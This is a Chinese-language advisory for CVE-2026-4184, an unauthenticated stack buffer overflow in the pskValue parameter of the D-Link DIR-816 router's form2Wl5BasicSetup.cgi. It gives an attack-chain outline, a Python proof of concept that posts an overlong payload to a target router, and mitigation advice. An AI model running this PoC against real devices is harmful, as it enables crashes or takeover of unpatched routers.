D-Link DIR-816路由器form2Wl5BasicSetup.cgi栈缓冲区溢出漏洞(CVE-2026-4184)

漏洞信息

漏洞编号

CVE-2026-4184

漏洞类型

栈缓冲区溢出

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-816 1.10CNB05

漏洞概述

CVE-2026-4184是影响D-Link DIR-816路由器1.10CNB05版本的严重安全漏洞。该漏洞位于路由器的Web管理界面goahead组件中，具体位于/goform/form2Wl5BasicSetup.cgi文件。攻击者可以通过构造恶意的pskValue参数值来触发栈缓冲区溢出。由于该漏洞无需认证即可远程利用，且CVSS评分高达9.8（严重级别），因此具有极高的安全风险。成功利用此漏洞可能导致路由器固件崩溃、拒绝服务攻击，甚至在某些情况下实现远程代码执行。值得注意的是，D-Link官方已停止对该产品的支持，因此用户无法获得官方安全更新。该漏洞的利用代码已被公开，攻击者可以轻易获取并使用，对互联网上的大量存在该型号设备的用户构成严重威胁。

技术细节

该漏洞属于经典的栈缓冲区溢出（Stack-based Buffer Overflow）类型。在C/C++编程中，当向固定大小的栈缓冲区写入超过其容量的数据时，多余的数据会覆盖栈上的其他重要信息，包括函数返回地址、帧指针等。在D-Link DIR-816路由器的/goform/form2Wl5BasicSetup.cgi处理程序中，对pskValue参数的处理存在此问题。攻击者可以通过HTTP POST请求向该CGI程序发送超长的pskValue字符串（如使用大量'A'字符填充），当程序将该值复制到栈上的固定大小缓冲区时，就会发生溢出。攻击者精心构造的溢出数据可以覆盖返回地址，将程序执行流重定向到攻击者控制的代码（如嵌入在溢出数据中的shellcode），从而实现远程代码执行。由于该漏洞位于路由器的Web服务组件中，且路由器通常直接暴露在网络中，攻击者可以通过互联网直接发起攻击，无需任何前置条件。

攻击链分析

STEP 1

信息收集

攻击者识别目标路由器型号为D-Link DIR-816，并确认其运行1.10CNB05固件版本

STEP 2

漏洞扫描

攻击者访问路由器的Web管理界面，定位到/goform/form2Wl5BasicSetup.cgi端点

STEP 3

构造恶意请求

攻击者构造包含超长pskValue参数的HTTP POST请求，用于触发栈缓冲区溢出

STEP 4

发送攻击载荷

通过互联网向目标路由器发送恶意请求，无需任何认证凭证

STEP 5

触发溢出

超长pskValue数据覆盖栈上的返回地址和关键数据结构

STEP 6

代码执行

攻击者通过覆盖返回地址将执行流重定向到恶意代码，实现远程代码执行或拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-4184 PoC - D-Link DIR-816 Buffer Overflow
# Target: /goform/form2Wl5BasicSetup.cgi
# Parameter: pskValue

def exploit_dlink_dir816(target_url):
    """
    Exploit for CVE-2026-4184 - Stack-based Buffer Overflow
    in D-Link DIR-816 router's form2Wl5BasicSetup.cgi
    """
    # Generate payload with excessive length to trigger overflow
    # Standard buffer size is typically 64-256 bytes
    overflow_length = 1000
    payload = 'A' * overflow_length
    
    # Target endpoint
    url = f"{target_url}/goform/form2Wl5BasicSetup.cgi"
    
    # POST data with malicious pskValue parameter
    data = {
        'pskValue': payload,
        'wlanBasicSettings': '1',
        'submit': 'Apply'
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload length: {len(payload)}")
        
        response = requests.post(url, data=data, headers=headers, timeout=10)
        
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Exploit sent successfully")
        
        return True
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>\n")
        print(f"Example: python {sys.argv[0]} http://192.168.0.1")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_dlink_dir816(target)

影响范围

D-Link DIR-816 1.10CNB05

防御指南

临时缓解措施

由于D-Link已停止对DIR-816的支持，建议用户采取以下临时措施：1) 在路由器防火墙上屏蔽对Web管理界面的外部访问，仅允许内网访问；2) 禁用路由器的远程管理功能；3) 监控网络流量，检测异常的长时间HTTP POST请求；4) 考虑更换为仍有安全支持的新型路由器；5) 如果设备已停止使用，应及时断电并更换。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4184
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4184
3 Details https://www.cvedetails.com/cve/CVE-2026-4184/
4 VulDB https://vuldb.com/cve/CVE-2026-4184
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_88/88.md
6 Link https://vuldb.com/?ctiid.351088
7 Link https://vuldb.com/?id.351088
8 Link https://vuldb.com/?submit.769832
9 Link https://www.dlink.com/